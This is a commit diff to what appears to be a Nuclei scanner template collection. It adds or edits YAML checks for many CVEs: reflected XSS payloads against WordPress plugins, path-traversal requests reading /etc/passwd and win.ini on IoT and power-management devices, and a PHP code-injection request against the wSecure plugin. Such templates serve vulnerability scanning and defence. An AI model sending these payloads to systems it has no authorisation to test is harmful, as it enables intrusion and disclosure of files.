Added some new template

CVE-2009-1558.yaml

@@ -0,0 +1,24 @@
+id: CVE-2009-1558
+
+info:
+  name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
+  reference: https://www.exploit-db.com/exploits/32954
+  tags: cve,cve2009,iot,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

CVE-2011-4618.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2011-4624.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2011-4926.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2011-5106.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2011-5107.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2011-5179.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2011-5181.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2011-5265.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2012-0901.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2012-1835.yaml

@@ -0,0 +1,34 @@
+id: CVE-2012-1835
+
+info:
+  name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2012-1835
+  tags: cve,cve2012,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+#     - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
+#     - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+#     - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+#     - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2012-2371.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%22%3E%3Cimg%2Fsrc%3Dx%20onerror%3Dalert%28123%29%3E'
+      - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<img/src=x onerror=alert(123)>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2012-4242.yaml

@@ -10,13 +10,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/?page_id=2&%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2012-4273.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E'
+      - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2012-4768.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/?dlsearch=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2012-5913.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3CScrIpT%3Ealert%28123%29%3C%2FScrIpT%3E'
+      - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<ScrIpT>alert(123)</ScrIpT>"
+          - "</sCripT><sCripT>alert(document.domain)</sCripT>"
         part: body
 
       - type: word

CVE-2013-2287.yaml

@@ -10,13 +10,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+      - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123);</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2013-4117.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2013-4625.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28123%29;%3C/script%3E'
+      - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123);</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2014-4513.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%22%3E%3C/textarea%3E%3Cscript%3Ealert%28123%29%3C/script%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
+      - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</textarea></script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2016-1000128.yaml

@@ -0,0 +1,29 @@
+id: CVE-2016-1000128
+
+info:
+  name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000128
+  tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2016-1000129.yaml

@@ -0,0 +1,30 @@
+id: CVE-2016-1000129
+
+info:
+  name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
+  tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2016-1000130.yaml

@@ -0,0 +1,30 @@
+id: CVE-2016-1000130
+
+info:
+  name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php
+  author: daffainfo
+  severity: medium
+  description: Reflected XSS in wordpress plugin e-search v1.0
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000130
+  tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2016-1000131.yaml

@@ -0,0 +1,29 @@
+id: CVE-2016-1000131
+
+info:
+  name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php
+  author: daffainfo
+  severity: medium
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000131
+  tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2016-1000132.yaml

@@ -0,0 +1,30 @@
+id: CVE-2016-1000132
+
+info:
+  name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000132
+  tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2016-1000133.yaml

@@ -0,0 +1,30 @@
+id: CVE-2016-1000133
+
+info:
+  name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
+  tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2016-1000134.yaml

@@ -0,0 +1,30 @@
+id: CVE-2016-1000134
+
+info:
+  name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via playlist.php
+  author: daffainfo
+  severity: medium
+  description: Reflected XSS in wordpress plugin hdw-tube v1.2
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134
+  tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2016-1000135.yaml

@@ -0,0 +1,30 @@
+id: CVE-2016-1000135
+
+info:
+  name: HDW WordPress Video Gallery <= 1.2 - Reflected Cross-Site Scripting (XSS) via mychannel.php
+  author: daffainfo
+  severity: medium
+  description: Reflected XSS in wordpress plugin hdw-tube v1.2
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000135
+  tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

CVE-2016-10956.yaml

@@ -2,7 +2,7 @@ id: CVE-2016-10956
 
 info:
   name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
-  author: daffainfo
+  author: daffainfo,0x240x23elu
   severity: high
   description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
   reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956

CVE-2016-10960.yaml

@@ -0,0 +1,29 @@
+id: CVE-2016-10960
+
+info:
+  name: wSecure Lite < 2.4 - Remote Code Execution (RCE)
+  author: daffainfo
+  severity: critical
+  description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter.
+  reference: |
+    - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/
+    - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960
+  tags: cve,cve2016,wordpress,wp-plugin,rce
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"
+    body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Nuclei: CVE-2016-10960"
+        condition: and
+        part: header
+      - type: status
+        status:
+          - 200

CVE-2017-17043.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E"
+      - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2017-17059.yaml

@@ -13,7 +13,7 @@ info:
 requests:
   - method: POST
     path:
-      - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1"
+      - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"
 
     body: "amty_hidden=1"
 
@@ -21,7 +21,7 @@ requests:
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2017-17451.yaml

@@ -17,7 +17,7 @@ requests:
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2017-18536.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E"
+      - "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<img src=x onerror=javascript:prompt(123)>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2017-9288.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E"
+      - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<img src=x onerror=alert(123)>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2018-11709.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/index.php/community/?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2018-12031.yaml

@@ -0,0 +1,30 @@
+id: CVE-2018-12031
+
+info:
+  name: Eaton Intelligent Power Manager 1.6 - Directory Traversal
+  author: daffainfo
+  severity: high
+  description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.
+  reference: |
+    - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-12031
+    - https://www.exploit-db.com/exploits/48614
+  tags: cve,cve2018,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd"
+      - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[0*]:0:0"
+          - "\\[(font|extension|file)s\\]"
+        condition: or
+        part: body
+      - type: status
+        status:
+          - 200

CVE-2018-16059.yaml

@@ -0,0 +1,27 @@
+id: CVE-2018-16059
+
+info:
+  name: WirelessHART Fieldgate SWG70 3.0 - Directory Traversal
+  author: daffainfo
+  severity: medium
+  reference: |
+        - https://nvd.nist.gov/vuln/detail/CVE-2018-16059
+        - https://www.exploit-db.com/exploits/45342
+  tags: cve,cve2018,iot,lfi
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/fcgi-bin/wgsetcgi"
+    body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand'
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+        part: body
+
+      - type: status
+        status:
+          - 200

CVE-2018-20462.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
+      - '{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2018-5316.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2019-15713.yaml

@@ -13,13 +13,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/?rsd=%27%3E%3Csvg%2Fonload%3Dconfirm%28123%29%3E'
+      - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<svg/onload=confirm(123)>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2019-16332.yaml

@@ -11,13 +11,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3Cscript%3Ealert%28123%29%3C/script%3E'
+      - '{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "</script><script>alert(document.domain)</script>"
         part: body
 
       - type: word

CVE-2019-16525.yaml

@@ -0,0 +1,30 @@
+id: CVE-2019-16525
+
+info:
+  name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS)
